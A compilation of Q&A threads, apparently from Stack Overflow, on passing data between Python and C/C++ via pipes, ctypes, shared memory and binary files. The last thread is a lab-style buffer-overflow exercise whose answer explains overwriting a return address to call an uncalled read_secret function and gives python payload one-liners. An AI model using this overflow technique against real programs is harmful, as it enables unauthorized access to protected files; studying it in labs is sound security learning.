How to pass a C struct to Python to get data?

I have code for both Python and C that need to communicate with each other through a pipe created by Popen. I have a test struct in C that needs to be passed back to Python, but I can't seem to reconstruct that struct on the Python side. This is a much more complicated project, but the struct I created below is just an example to get the code to work, and I can try to figure out the more advanced things later. I am not an expert in C, pointers, or piping, and I do not have a clear understanding of them. Most of the C code below is just from my readings.
Python:
testStruct = struct.Struct('< i')
cProg = Popen("./cProg.out", stdin=PIPE, stdout=PIPE)
data = ""
dataRead = cProg.stdout.read(1)
while dataRead != "\n":
    data += dataRead
    dataRead = cProg.stdout.read(1)
myStruct = testStruct.unpack(data)
print myStruct.i
C:
typedef struct {
    int i;
} TestStruct;

int main(void)
{
    int wfd = fileno(stdout);
    TestStruct t;
    t.i = 5;
    char sendBack[sizeof(t)];
    memcpy(sendBack, &t, sizeof(t));
    write(wfd, sendBack, sizeof(sendBack));
    write(wfd, "\n", 1);
}
But when I run the Python code I get the error:
unpack requires a string argument of length 4
Like I said, I do not understand structs and C well. If there are any suggestions on refining this code, or better yet another way of passing a C struct back to Python to unpack and grab the data, I'd appreciate it. I can read and write through the pipe; the code I have posted is just a snippet from my actual code. I know that the issue has to do with sending the struct back to Python through stdout.

Here's an example of reading data in Python from a C program through a pipe.
C Program
#include <stdio.h>

typedef struct {
    int i;
    int j;
} TestStruct;

int main() {
    TestStruct ts = {11111, 22222};
    fwrite(&ts, sizeof ts, 1, stdout);
    return 0;
}
Python 2.7 Program
from subprocess import Popen, PIPE
from struct import calcsize, unpack

cprog = Popen("cprog", stdout=PIPE)
fmt = "@ii"
data = cprog.stdout.read(calcsize(fmt))
cprog.stdout.close()
(i, j) = unpack(fmt, data)
print i, j
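In Python 3, stdout.read returns bytes rather than str and print is a function, but the unpack logic is the same. It can be checked with an in-memory round trip, simulating the bytes the C program would write (the compiled cprog binary itself is assumed, not included here):

```python
import struct

# Simulate the bytes the C program writes: a struct of two native C ints.
payload = struct.pack("@ii", 11111, 22222)

# Python 3 reading side: bytes in, tuple out.
i, j = struct.unpack("@ii", payload)
print(i, j)  # 11111 22222
```

The "@" prefix uses native byte order, sizes, and alignment, matching what fwrite of an in-memory C struct produces on the same machine.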

Related

Sharing Python multiprocessing shared Value with C extension

I have two processes in python that share a single boolean flag:
from multiprocessing import Process, Value

class MyProcess(Process):
    def __init__(self):
        self.flag = Value('B', False)
        # [...]

    def run(self):
        while self.active:
            # do_something()
            if some_condition:
                self.work_to_be_extended__()

    def work_to_be_extended__(self) -> bool:
        while some_internal_loop_condition:
            if self.flag.value:
                # do something
                return result

if __name__ == '__main__':
    my_proc = MyProcess()
    my_proc_flag = my_proc.flag
    my_proc.start()
    # [...] Some work
    if condition:
        my_proc_flag.value = True
I need to put MyProcess.work_to_be_extended in an extension module to be executed in C code. Something like:
bool extended_work(void)
{
    while (some_condition) {
        if (my_proc_flag) {
            do_something();
        }
        return result;
    }
}
I've not designed the extension yet, since I'd need to understand first how to share the MyProcess.flag variable. Please note that I don't need to pass the variable's value; I need to pass its reference, so that the extension sees a change in the flag value made in the main process, where the extension does not live.
Hope I've been quite clear.
Multiprocessing has a sharedctypes submodule for ctypes arrays and values. You can use it to create a shared ctypes value (an int in my example), and then use ctypes.byref to send a pointer to that int.
Since the underlying mechanism is SHM (not some hidden piping under the hood), the memory pointed to by this reference really is the same in both processes. shval.value is the *p pointed to by the p argument passed, that is byref(shval).
So, no need for the size-1 array of my previous answer, and, more importantly, for the disclaimer accompanying it.
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>

void myf(volatile uint32_t *p) {
    for (;;) {
        printf("<c>%u</c>\n", *p);
        if (*p == 100) return;
        (*p)++;
        sleep(1);
    }
}
import multiprocessing as mp
import multiprocessing.sharedctypes as st
import ctypes

mylib = ctypes.CDLL("libtoto.so")
mylib.myf.argtypes = [ctypes.c_void_p]
shval = st.RawValue(ctypes.c_uint32, 12)

class MyProcess(mp.Process):
    def __init__(self):
        super().__init__()

    def run(self):
        mylib.myf(ctypes.byref(shval))

if __name__ == "__main__":
    myproc = MyProcess()
    myproc.start()
    while True:
        i = int(input("val>"))
        shval.value = i
So, short answer to your question is: use multiprocessing.sharedctypes and pass byref(sharedval) to your function.
Premise
This answer comes from an adaptation of the good solution given by @chrslg. This extends that usage to other paradigms of Python/C programming, such as the C Extension API, Cython and Boost::Python.
Please, read that answer first for a deeper background.
Overview and core summary:
Using a sharedctypes.RawValue as the required variable, it is possible to obtain the underlying data address by means of ctypes.addressof.
Therefore, one can pass the address of the variable as a long long int (64 bit) and cast it into a pointer to the required data. For example, for a uint8_t variable, one has, in the C extension:
int64_t address; // This is initialized in some way, depending on the C interface to Python
// Pointer to shared data
uint8_t* pointer = (uint8_t*)(address);
printf("Current value of shared data: %u\n", *pointer);
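As a minimal single-process sketch of this address-passing idea (no C extension involved; the cast back from the integer address happens via ctypes.cast instead of in C):

```python
import ctypes
from multiprocessing.sharedctypes import RawValue

# A shared byte, as in the examples below
shared = RawValue(ctypes.c_ubyte, 42)

# The address that would be handed to the C side as a 64-bit integer
address = ctypes.addressof(shared)

# What the C extension does with that integer, done here with ctypes.cast:
pointer = ctypes.cast(address, ctypes.POINTER(ctypes.c_ubyte))
print(pointer.contents.value)  # 42

# Writes through the pointer are visible in the shared value
pointer.contents.value = 7
print(shared.value)  # 7
```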
Working example for different Python - C/C++ interfaces
Common C shared library
Let's create a basic, simple C library that just reads, once per second, the value of the variable being shared:
// cshare_data/cshare_data.c
#include "cshare_data.h"
#include <time.h>
#include <unistd.h>
#include <stdio.h>

void cshare_data(uint8_t* data, char from_where_called) {
    char *s = NULL;
    if (from_where_called == 0) {
        s = "cTypes CDLL";
    } else if (from_where_called == 1) {
        s = "Python C Extension";
    } else if (from_where_called == 2) {
        s = "Boost::Python";
    } else if (from_where_called == 3) {
        s = "Cython";
    }
    for (int i = 0; i < 10; i++) {
        printf("C code read from %s a value of: %u\n", s, *data);
        sleep(1);
    }
}
The header:
// cshare_data/cshare_data.h
#ifndef CSHARE_DATA_H
#define CSHARE_DATA_H

#include <stdint.h>
#include <stddef.h>

extern void cshare_data(uint8_t*, char);

#endif
Python shared data editing process
For the rest of the examples, I'll refer to the following Python process that is modifying the shared data (unsigned char in the example):
from multiprocessing.sharedctypes import RawValue, Value
import multiprocessing.sharedctypes as st
from multiprocessing import Process

class MyProcess(Process):
    def __init__(self):
        Process.__init__(self)
        self.int_val = RawValue(st.ctypes.c_ubyte, 0)

    def run(self) -> None:
        import time
        for _ in range(10):
            print('Value in Python Process: ', self.int_val.value)
            self.int_val.value += 1
            time.sleep(1)

my_proc = MyProcess()
my_proc.start()
NOTE: This will not be repeated hereinafter.
Python C Extension
A Python C Extension API that makes use of the above pattern follows:
#include <Python.h>
#include <stdio.h>
#include <time.h>
#include "cshare_data.h"

static PyObject *cshare_data_wrapper(PyObject *self, PyObject *args)
{
    // This will store the address of the uchar variable being passed from Python
    int64_t address = 0;
    // Convert the single-element tuple into an 8-byte int (the address)
    if (!PyArg_ParseTuple(args, "L", &address)) {
        printf("Error parsing Tuple\n");
        return NULL;
    }
    // Now address is reinterpreted as the shared variable pointer
    uint8_t *pointer = (uint8_t *)(address);
    // Call the library function
    cshare_data(pointer, 1);
    Py_RETURN_NONE;
}

static PyMethodDef CShareDataMethods[] = {
    {"cshare_data", cshare_data_wrapper, METH_VARARGS, "Python interface for the cshare_data C library function"},
    {NULL, NULL, 0, NULL}
};

static struct PyModuleDef cshareddata_module = {
    PyModuleDef_HEAD_INIT,
    "csharedata_module",
    "Python interface for the cshare_data C library function",
    -1,
    CShareDataMethods
};

PyMODINIT_FUNC PyInit_cshare_data_pyext(void) {
    return PyModule_Create(&cshareddata_module);
}
Please, refer to the official documentation and this very good tutorial for deeper insight into the Python C-API.
Boost::Python
Very similar to what was done for the Python C-API, the Boost wrapper looks like:
extern "C" {
#include "cshare_data.h"
}
#include <boost/python.hpp>

void cshare_data_boost_wrapper(long long int data_address) {
    uint8_t* data = reinterpret_cast<uint8_t*>(data_address);
    cshare_data(data, 2);
}

BOOST_PYTHON_MODULE(ctrigger) {
    using namespace boost::python;
    def("cshare_data", cshare_data_boost_wrapper);
}
CMake - Library builds
Given a project with the following tree structure:
```
project_root
| cshare_data.py
|---clibs
| | cshare_data_boost.so
| | cshare_data_pyext.so
| | cshare_data.so
|
|---cshare_data
| | cshare_data.c
| | cshare_data.h
|
| CMakeList.txt
```
The following compilation CMake script was used:
cmake_minimum_required (VERSION 2.6)
project (cshare_data)
set(CMAKE_SHARED_MODULE_PREFIX "")
set(CMAKE_SHARED_LIBRARY_PREFIX "")
# Common C shared library
set(CMAKE_LIBRARY_OUTPUT_DIRECTORY ${CMAKE_SOURCE_DIR}/clibs)
include_directories(${CMAKE_SOURCE_DIR}/cshare_data)
link_directories(${CMAKE_SOURCE_DIR}/clibs)
# --- Common C shared library ---
add_library(cshare_data SHARED cshare_data/cshare_data.c)
# Needed for Python C Extension Module and Boost::Python
include_directories("/usr/include/python3.8")
# --- Python C Extension Module library ---
add_library(cshare_data_pyext MODULE cshare_data_pyinterface/cshare_data_pyext.c)
target_link_libraries(cshare_data_pyext python3.8)
target_link_libraries(cshare_data_pyext cshare_data)
# --- Boost::Python library ---
include_directories("/home/buzz/boost_1_80_0")
link_directories("/home/buzz/boost_1_80_0/build/lib")
add_library(cshare_data_boost MODULE cshare_data_pyinterface/cshare_data_boost.cpp)
target_link_libraries(cshare_data_boost python3.8)
target_link_libraries(cshare_data_boost boost_python38)
target_link_libraries(cshare_data_boost cshare_data)
Python - Calling C wrappers
Just for the purpose of demonstration, I've written 3 different processes that share the same int_val (handled by the above MyProcess) and call the C function to print the value of this variable. Note that, though the lines of code are the same, the address must be retrieved in each process, since multiprocessing.sharedctypes wraps the IPC synchronization architecture for int_val under the hood, meaning that each process holds its own proxy to int_val.
from enum import IntEnum
from typing import List

my_proc = MyProcess()
my_proc.start()

class FromWhere(IntEnum):
    ctype = 0
    python_c_extension = 1
    boost_python = 2

def from_ctype_import_dll(int_val: RawValue):
    import ctypes
    reference = st.ctypes.byref(int_val)
    mylib = ctypes.CDLL("clibs/cshare_data.so")
    mylib.cshare_data.argtypes = [ctypes.c_void_p, ctypes.c_char]
    mylib.cshare_data(reference, FromWhere.ctype.value)

def from_python_c_extension(int_val: RawValue):
    from clibs import cshare_data_pyext
    address = st.ctypes.addressof(int_val)
    cshare_data_pyext.cshare_data(address)

def from_boost_python(int_val: RawValue):
    from clibs import cshare_data_boost
    address = st.ctypes.addressof(int_val)
    cshare_data_boost.cshare_data(address)

ps: List[Process] = []
ps.append(Process(target=from_ctype_import_dll, args=(my_proc.int_val,)))
ps.append(Process(target=from_python_c_extension, args=(my_proc.int_val,)))
ps.append(Process(target=from_boost_python, args=(my_proc.int_val,)))
for p in ps:
    p.start()
for p in ps:
    p.join()
The result achieved:
Value in Python Process: 0
C code read from cTypes CDLL a value of: 1
C code read from Python C Extension a value of: 1
C code read from Boost::Python a value of: 1
Value in Python Process: 1
C code read from cTypes CDLL a value of: 2
C code read from Boost::Python a value of: 2
C code read from Python C Extension a value of: 2
Value in Python Process: 2
C code read from cTypes CDLL a value of: 3
C code read from Boost::Python a value of: 3
C code read from Python C Extension a value of: 3
C code read from cTypes CDLL a value of: 3
Value in Python Process: 3
C code read from Boost::Python a value of: 4
C code read from Python C Extension a value of: 4
C code read from cTypes CDLL a value of: 4
Value in Python Process: 4
C code read from Boost::Python a value of: 5
C code read from Python C Extension a value of: 5
C code read from cTypes CDLL a value of: 5
Value in Python Process: 5
C code read from Boost::Python a value of: 6
C code read from Python C Extension a value of: 6
C code read from cTypes CDLL a value of: 6
Value in Python Process: 6
C code read from Python C Extension a value of: 7
C code read from Boost::Python a value of: 7
C code read from cTypes CDLL a value of: 7
Value in Python Process: 7
C code read from Python C Extension a value of: 8
C code read from Boost::Python a value of: 8
C code read from cTypes CDLL a value of: 8
Value in Python Process: 8
C code read from Python C Extension a value of: 9
C code read from Boost::Python a value of: 9
C code read from cTypes CDLL a value of: 9
Value in Python Process: 9
C code read from Python C Extension a value of: 10
C code read from Boost::Python a value of: 10

Using Python to write a mix of integer and floating point numbers to a binary file read by a code in C

I have code in C which reads data from a file in a binary format:
FILE *file;
int int_var;
double double_var;
file = fopen("file.dat", "r");
fread(&int_var, sizeof(int), 1, file);
fread(&double_var, sizeof(double), 1, file);
The above is a simplified but accurate version of the actual code. I have no choice over this code or the format of this file.
The data being read in C is produced using Python code. How do I write this data to a file in the same binary format? I looked into bytes and bytearrays, but they seem to only work with integers and strings. I need something like:
f = open('file.dat', 'wb')
f.write(5)
f.write(5.0)
f.close()
that will work with the above C code.
As mentioned in a comment, you need the struct library:
Creating file.dat with
#!/usr/bin/env python3
import struct

with open('file.dat', 'wb') as f:
    f.write(struct.pack('=id', 1, 5.0))
and then reading it with
#include <stdio.h>

int main(void) {
    int int_var;
    double double_var;
    FILE *file = fopen("file.dat", "rb");
    if (!file) {
        fprintf(stderr, "couldn't open file.dat!\n");
        return 1;
    }
    if (fread(&int_var, sizeof(int), 1, file) != 1) {
        fprintf(stderr, "failed to read int!\n");
        return 1;
    }
    if (fread(&double_var, sizeof(double), 1, file) != 1) {
        fprintf(stderr, "failed to read double!\n");
        return 1;
    }
    printf("int = %d\ndouble = %f\n", int_var, double_var);
    fclose(file);
    return 0;
}
will output
int = 1
double = 5.000000
Note the = in the pack format definition; that tells Python not to add alignment padding bytes like you'd get in a C structure like
struct foo {
    int int_var;
    double double_var;
};
Without that, you'll get unexpected results reading the double in this example. You also have to worry a little bit about endianness if you want the file to be portably read on any other computer.
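For instance, the byte order can be pinned explicitly instead of relying on the machine's native order. A quick sketch of the three relevant prefixes:

```python
import struct

# '=' : native byte order, standard sizes, no padding
# '<' : little-endian; '>' : big-endian (both also standard sizes, no padding)
native = struct.pack('=id', 1, 5.0)
little = struct.pack('<id', 1, 5.0)
big    = struct.pack('>id', 1, 5.0)

# All three are 12 bytes: 4 for the int, 8 for the double, no padding
print(len(native), len(little), len(big))  # 12 12 12

# The little- and big-endian encodings are byte-reversed field by field
print(little[:4] == big[:4][::-1])  # True
```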

Trying to open a dll written in c with python ctypes and run the function in it, but it comes as int, not a string

These are my example source code:
C
#include <stdio.h>
#include <stdlib.h>

__declspec(dllexport)
char* sys_open(char* file_name)
{
    char *file_path_var = (char *) malloc(100 * sizeof(char));
    FILE *wrt = fopen(file_name, "r");
    fscanf(wrt, "%s", file_path_var);
    fclose(wrt);
    return file_path_var;
}
Test.txt
test
Python
from ctypes import *
libcdll = CDLL("c.dll")
taken_var = libcdll.sys_open("test.txt")
print("VAR: ", taken_var)
Result
VAR: 4561325
So I'm just getting a random number. What should i do?
I'm not a C developer, but isn't sys_open returning a pointer? Last time I checked, pointers are word-sized memory addresses, so it might make sense that Python sees a numerical value and converts it to decimal. Maybe what you want to return from your C function is &file_path_var.
I found the solution.
The Python file was wrong; it must be:
from ctypes import *
libcdll = CDLL("c.dll")
taken_var = libcdll.sys_open("test.txt")
print("VAR: ", c_char_p(taken_var).value)
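The number printed was the pointer's integer value: by default, ctypes assumes a foreign function returns a C int. The effect of c_char_p(taken_var).value can be reproduced with a pure-ctypes round trip, no DLL needed (the buffer contents here are made up for the example):

```python
import ctypes

# What happened in the question: a char* seen as a plain integer address.
buf = ctypes.create_string_buffer(b"test")
taken_var = ctypes.cast(buf, ctypes.c_void_p).value
print(isinstance(taken_var, int))  # True

# The accepted fix: reinterpret that integer as a char* and read the string.
print(ctypes.c_char_p(taken_var).value)  # b'test'
```

A cleaner alternative is to declare the return type once, up front, so ctypes converts automatically (c.dll and sys_open are the question's names): `libcdll.sys_open.restype = c_char_p`, after which `libcdll.sys_open(b"test.txt")` returns the bytes directly.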

How to use Python to input to and get output from C++ program?

I'm currently trying to automate the testing of a C++ program which takes input from the terminal and outputs the result onto the terminal. For example my C++ file would do something like below:
#include <iostream>

int main() {
    int a, b;
    std::cin >> a >> b;
    std::cout << a + b;
}
And my Python file used for testing would be like:
a = [1, 2, 3, 4, 5]
b = [2, 3, 1, 4, 5]
results = []
for i in range(5):
    # input a[i] and b[i] into the C++ program
    # append answer from C++ program into results
Although it is possible to input and output from C++ through file I/O, I'd rather leave the C++ program untouched.
What can I do instead of the commented out lines in the Python program?
You could use subprocess.Popen. Sample code:
#include <iostream>

int sum(int a, int b) {
    return a + b;
}

int main()
{
    int a, b;
    std::cin >> a >> b;
    std::cout << sum(a, b) << std::endl;
}
from subprocess import Popen, PIPE
program_path = "/home/user/sum_prog"
p = Popen([program_path], stdout=PIPE, stdin=PIPE)
p.stdin.write(b"1\n")
p.stdin.write(b"2\n")
p.stdin.flush()
result = p.stdout.readline().strip()
assert result == b"3"
python_program.py | cpp_program
On the command line will feed the standard output of python_program.py into the standard input of cpp_program.
This works for all executables, no matter what programming language they are written in.
You can communicate through a .txt file:
Write your matrix to a text file and read it in Python; two programs can't use the same memory.
Alternatively, use Cython and wrap your C++ code so it can be called from Python:
https://github.com/cythonbook/examples/tree/master/07-wrapping-c/01-wrapping-c-functions-mt-random
You can use subprocess to get data from a called program; an example for whois:
import subprocess
proc = subprocess.Popen(['whois', 'google.com'], stdout=subprocess.PIPE)
data = proc.communicate()[0]
print( data )
You will need to use pythons subprocess module (https://docs.python.org/2/library/subprocess.html) to start your compiled C++ application and send in your variables and read the output of the subprocess using Popen.communicate() (https://docs.python.org/2/library/subprocess.html#subprocess.Popen.communicate).
Example code might look like:
import subprocess
p = subprocess.Popen(["cpp_app"], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
out, _ = p.communicate(b"1 2")
print(out)
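Putting this together for the original question's loop, one communicate call per run works well (each communicate call ends the process, so a fresh Popen is created per pair). Here sys.executable -c serves as a stand-in for the compiled C++ binary, which is assumed, not included:

```python
import sys
from subprocess import Popen, PIPE

# Stand-in for the C++ binary: reads two ints, prints their sum.
child_cmd = [sys.executable, "-c",
             "a, b = map(int, input().split()); print(a + b)"]

a = [1, 2, 3, 4, 5]
b = [2, 3, 1, 4, 5]
results = []
for i in range(5):
    p = Popen(child_cmd, stdin=PIPE, stdout=PIPE)
    out, _ = p.communicate(f"{a[i]} {b[i]}\n".encode())
    results.append(int(out))
print(results)  # [3, 5, 4, 8, 10]
```

To test the real program, replace child_cmd with the path to the compiled executable.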

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

void read_secret() {
    FILE *fptr = fopen("/task2/secret.txt", "r");
    char secret[1024];
    fscanf(fptr, "%512s", secret);
    printf("Well done!\nThere you go, a wee reward: %s\n", secret);
    exit(0);
}

int fib(int n)
{
    if (n == 0)
        return 0;
    else if (n == 1)
        return 1;
    else
        return (fib(n-1) + fib(n-2));
}

void vuln(char *name)
{
    int n = 20;
    char buf[1024];
    int f[n];
    int i;
    for (i = 0; i < n; i++) {
        f[i] = fib(i);
    }
    strcpy(buf, name);
    printf("Welcome %s!\n", buf);
    for (i = 0; i < 20; i++) {
        printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
    }
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("Tell me your names, tricksy hobbitses!\n");
        return 0;
    }
    // printf("main function at %p\n", main);
    // printf("read_secret function at %p\n", read_secret);
    vuln(argv[1]);
    return 0;
}
attack.sh //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I pass a large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, so that it returns to the read_secret function instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kind of confused. I know that I would have to replace the return address into main() with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability, you first have to identify the offset at which you get a segfault. In your case I assume it's 1026. The whole game is to overwrite the saved return address (EIP, which tells the program what to do next) with the address of your own target.
To find the address of the function, open your program in gdb and type:
p read_secret
Then copy the address. You then have to convert it to little-endian (or big-endian, depending on the architecture) byte order. I do it with the struct module in Python:
import struct
struct.pack("<I", address)  # "<I" is little endian; for big endian it's different
Then you have to add it to your input to the binary, something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesn't work, then just add a few more characters to your offset; there might be something you didn't see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.
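As a concrete illustration of the byte-order step (the address value here is made up for the example, not the real address of read_secret):

```python
import struct

address = 0x080491e2  # hypothetical address of read_secret from gdb

# Little-endian, as a 32-bit x86 stack expects: bytes come out reversed
packed = struct.pack("<I", address)
print(packed)  # b'\xe2\x91\x04\x08'

# Big-endian keeps the human-readable order
print(struct.pack(">I", address))  # b'\x08\x04\x91\xe2'
```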
